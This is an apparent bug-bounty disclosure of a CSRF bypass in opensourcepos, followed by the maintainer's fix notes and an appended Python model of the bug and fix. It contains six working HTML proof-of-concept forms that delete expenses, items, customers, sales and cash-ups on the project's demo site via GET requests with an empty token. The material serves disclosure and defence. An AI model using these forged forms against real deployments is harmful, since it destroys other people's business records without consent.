Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Sep 28th 2021


Description

In some delete actions, I changed the HTTP request method to GET and also removed the CSRF token from the request, and then I was able to bypass your CSRF protection.

Occurrences

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/expenses/delete">
      <input type="hidden" name="ids&#91;&#93;" value="1" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

With this PoC.html, an attacker is able to delete any Expenses with ids[] 1, and this can be extended with any more ids.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/items/delete">
      <input type="hidden" name="ids&#91;&#93;" value="37" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

With this PoC.html, an attacker is able to delete the item with ids[] 37, and also more.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/expenses_categories/delete">
      <input type="hidden" name="ids&#91;&#93;" value="2" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

With this PoC.html, an attacker is able to delete any expenses categories with ids[] 2 and any more ids.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/customers/delete">
      <input type="hidden" name="ids&#91;&#93;" value="7" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

With this PoC.html, an attacker is able to delete any Customers with ids[] 7, and this can be extended with any more ids.

For deleting Sales, you don't have any CSRF protection.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/sales/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

With this PoC.html, an attacker is able to delete the sale with id 1.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/cashups/delete">
      <input type="hidden" name="ids&#91;&#93;" value="1" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

With this PoC.html, an attacker is able to delete any Cash Ups with ids[] 1, and this can be extended with any more ids.

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago
amammad modified the report
2 years ago
opensourcepos/opensourcepos maintainer validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit ea879f 2 years ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE
Sales.php#L1-L1569 has been validated
Expenses.php#L1-L183 has been validated
Items.php#L1-L1227 has been validated
Customers.php#L1-L465 has been validated
Cashups.php#L1-L246 has been validated
jekkos
2 years ago

Maintainer


Hi, I have deployed a fix on dev.opensourcepos.org now. The app now blocks GET requests for the methods you have enumerated here.

0x9x
2 years ago

Nice find!
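The bypass in the report and the fix the maintainer describes, as an added example that is not code from opensourcepos or from the report. It is a framework-agnostic Python model: the token check that runs only on POST, the `handle` function, the `enforce_post` switch and the session token value are all assumptions made for illustration.

```python
# Model (assumption): the CSRF filter validates the token only on POST,
# while the delete handler accepts ids[] from any HTTP method.
import hmac
from urllib.parse import parse_qs

SESSION_TOKEN = "constructed-session-token"  # constructed sample value
DELETE_ROUTES = {"/expenses/delete", "/items/delete", "/customers/delete"}


def csrf_ok(method, params):
    """Token check that skips every request that is not a POST."""
    if method != "POST":
        return True
    sent = params.get("csrf_ospos_v3", [""])[0]
    return hmac.compare_digest(sent, SESSION_TOKEN)


def handle(method, path, query="", body="", enforce_post=False):
    """Return (status, deleted_ids) for one request against the model app."""
    params = parse_qs(query, keep_blank_values=True)
    if method == "POST":
        params.update(parse_qs(body, keep_blank_values=True))
    if path not in DELETE_ROUTES:
        return 404, []
    # The fix described in the thread: refuse non-POST on delete actions,
    # so every request that reaches the handler has had its token checked.
    if enforce_post and method != "POST":
        return 405, []
    if not csrf_ok(method, params):
        return 403, []
    return 200, [int(i) for i in params.get("ids[]", [])]


# Constructed requests: the cross-site GET with an empty token, a cross-site
# POST with an empty token, and a POST from the application's own UI.
FORGED_GET = ("GET", "/expenses/delete", "ids%5B%5D=1&csrf_ospos_v3=")
FORGED_POST = ("POST", "/expenses/delete", "", "ids%5B%5D=1&csrf_ospos_v3=")
LEGIT_POST = ("POST", "/expenses/delete", "",
              "ids%5B%5D=1&csrf_ospos_v3=" + SESSION_TOKEN)

if __name__ == "__main__":
    cases = [("forged GET", FORGED_GET), ("forged POST", FORGED_POST),
             ("legit POST", LEGIT_POST)]
    for label, req in cases:
        print(label, "| before:", handle(*req),
              "| after:", handle(*req, enforce_post=True))
```

A regression test for this class of bug should assert, for each state-changing route, that a GET is rejected and that a POST without a valid token is rejected.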
